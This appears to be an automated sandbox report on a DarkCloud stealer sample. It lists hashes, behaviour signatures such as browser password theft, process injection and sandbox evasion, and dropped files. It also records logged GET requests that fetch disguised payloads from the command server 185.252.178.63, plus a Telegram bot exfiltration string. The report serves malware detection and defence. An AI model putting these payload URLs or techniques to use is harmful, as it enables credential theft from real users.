Windows Analysis Report
BPL_1000572_007.bat.exe

Overview

General Information

Sample Name: BPL_1000572_007.bat.exe
Analysis ID: 708242
MD5: 4ff4a281a08a0681597794a3024fb584
SHA1: d3a70362b238b82db1ef1aefef920afedf717880
SHA256: a6db7e8c70adc90b74c0f08503f49cf041d79afed3b916676892725ce2dbcce0
Tags: exe
Infos:

Detection

DarkCloud
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Generic Dropper
Yara detected DarkCloud
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Creates multiple autostart registry keys
Writes or reads registry keys via WMI
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Machine Learning detection for sample
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Machine Learning detection for dropped file
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

AV Detection

barindex
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Roaming\note\pdf.exe ReversingLabs: Detection: 32%
Source: BPL_1000572_007.bat.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Joe Sandbox ML: detected
Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: BPL_1000572_007.bat.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: BPL_1000572_007.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: .pdb= source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Xml.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: BPL_1000572_007.bat.exe, BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Core.pdb\ source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.pdbj source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Xml.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Core.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: mscorlib.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.PDBL source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Core.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.pdb4: source: WER8A92.tmp.dmp.21.dr
Source: Binary string: Wthdlxoyqvnqsfcfiinf.PDB source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256w^ source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.PDB source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.ni.pdb source: WER8A92.tmp.dmp.21.dr

Networking

barindex
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49707 -> 185.252.178.63:80
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49710 -> 185.252.178.63:80
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49711 -> 185.252.178.63:80
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49712 -> 185.252.178.63:80
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49715 -> 185.252.178.63:80
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe DNS query: name: showip.net
Source: Joe Sandbox View ASN Name: LVLT-10753US LVLT-10753US
Source: global traffic HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /loader/uploads/inf_Hpgwbzkt.bmp HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 185.252.178.63 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: BPL_1000572_007.bat.exe, 00000000.00000002.448025477.0000000002961000.00000004.00000800.00020000.00000000.sdmp, Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.475145400.0000000002941000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.590879859.000000000329C000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.589770623.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.589535207.00000000033F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.252.178.63
Source: BPL_1000572_007.bat.exe, 00000000.00000002.448025477.0000000002961000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.590699923.0000000003291000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.589770623.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.589535207.00000000033F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.png
Source: BPL_1000572_007.bat.exe, pdf.exe.0.dr, fireless.exe.13.dr String found in binary or memory: http://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.pngP/r/
Source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.475145400.0000000002941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.252.178.63/loader/uploads/inf_Hpgwbzkt.bmp
Source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.430950598.00000000006D2000.00000002.00000001.01000000.00000007.sdmp, Wthdlxoyqvnqsfcfiinf.exe.0.dr String found in binary or memory: http://185.252.178.63/loader/uploads/inf_Hpgwbzkt.bmp)Acugwsmmzufefycomfxvihl
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0K
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: BPL_1000572_007.bat.exe, 0000000D.00000002.579528582.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.449921184.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.452428690.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467298844.000000000109D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schema.org
Source: BPL_1000572_007.bat.exe, 00000000.00000002.448025477.0000000002961000.00000004.00000800.00020000.00000000.sdmp, Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.475145400.0000000002941000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.590879859.000000000329C000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.589770623.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.589535207.00000000033F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: BPL_1000572_007.bat.exe, 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://showip.netxhttp://www.mediacollege.com/internet/utilities/show-ip.shtml__vbaLsetFixstr__vbaFi
Source: Amcache.hve.21.dr String found in binary or memory: http://upx.sf.net
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BPL_1000572_007.bat.exe, 00000000.00000002.448721724.000000000298E000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.598968323.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592125246.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.598264553.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.590614103.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591295608.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.597986476.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.590549636.0000000003428000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot4(SpawnProcess)
Source: LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
